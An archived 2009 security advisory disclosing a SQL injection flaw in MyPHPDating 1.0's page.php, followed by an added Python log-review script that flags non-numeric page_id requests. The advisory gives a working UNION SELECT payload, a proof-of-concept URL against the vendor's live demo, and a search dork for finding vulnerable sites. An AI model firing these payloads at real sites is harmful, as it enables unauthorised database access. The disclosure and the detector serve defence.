MyPHPDating 1.0 SQL Injection

2009-07-08T00:00:00
ID PACKETSTORM:78999
Type packetstorm
Reporter NoGe
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
=================================================================================================================================  
  
  
[o] MyPHPDating 1.0 SQL Injection Vulnerability  
  
Software : MyPHPDating version 1.0  
Vendor : http://www.phponlinedatingsoftware.com/  
Demo : http://www.phponlinedatingsoftware.com/demo.htm  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
=================================================================================================================================  
  
  
[o] Description  
  
MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.  
It combines all the features of any standard online dating / Matchmaking website plus many more features  
that make your dating website very powerful and easy to use.  
  
  
  
[o] Vulnerable file  
  
page.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/page.php?page_id=[SQL]  
http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--  
  
  
  
[o] Proof of concept [demo]  
  
http://www.phponlinedatingsoftware.com/demo/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--  
  
  
  
[o] Dork  
  
"Powered by MyPHPDating"  
  
  
=================================================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/news ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang  
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
=================================================================================================================================  
`
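
A log-review check for the request shown under "[o] Exploit", added here as an example and not part of the original advisory: it flags any request to page.php whose page_id is not a plain integer. The log lines, the /dating/ path and the assumption that valid page_id values are purely numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format). Line 2 carries the
# advisory's request; the others are made up for this example.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Jul/2009:10:00:01 +0000] "GET /dating/page.php?page_id=3 HTTP/1.1" 200 5120
198.51.100.9 - - [08/Jul/2009:10:00:05 +0000] "GET /dating/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())-- HTTP/1.1" 200 812
198.51.100.9 - - [08/Jul/2009:10:00:09 +0000] "GET /dating/page.php?page_id=-1%20UNION%20SELECT%201,2,3,concat(@@version,0x3c3e,database())-- HTTP/1.1" 200 812
198.51.100.4 - - [08/Jul/2009:10:00:12 +0000] "GET /dating/page.php?page_id=12abc HTTP/1.1" 200 640
198.51.100.4 - - [08/Jul/2009:10:00:15 +0000] "GET /dating/index.php?q=union+select HTTP/1.1" 200 4100
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID_RE = re.compile(r"[0-9]{1,10}")  # assumed shape of a valid page_id
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)


def suspicious_page_requests(log_text, script="page.php", param="page_id"):
    """Return (line_no, client, reason, decoded_value) for every request to
    `script` whose `param` is not a plain integer."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qsl percent-decodes and turns '+' into a space, so encoded
        # and plain forms of the same value compare equal. Every occurrence
        # of the parameter is checked, since it may be repeated.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name != param or NUMERIC_ID_RE.fullmatch(value):
                continue
            reason = "union-select" if UNION_RE.search(value) else "non-numeric"
            findings.append((line_no, line.split()[0], reason, value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_page_requests(SAMPLE_LOG):
        print(finding)
```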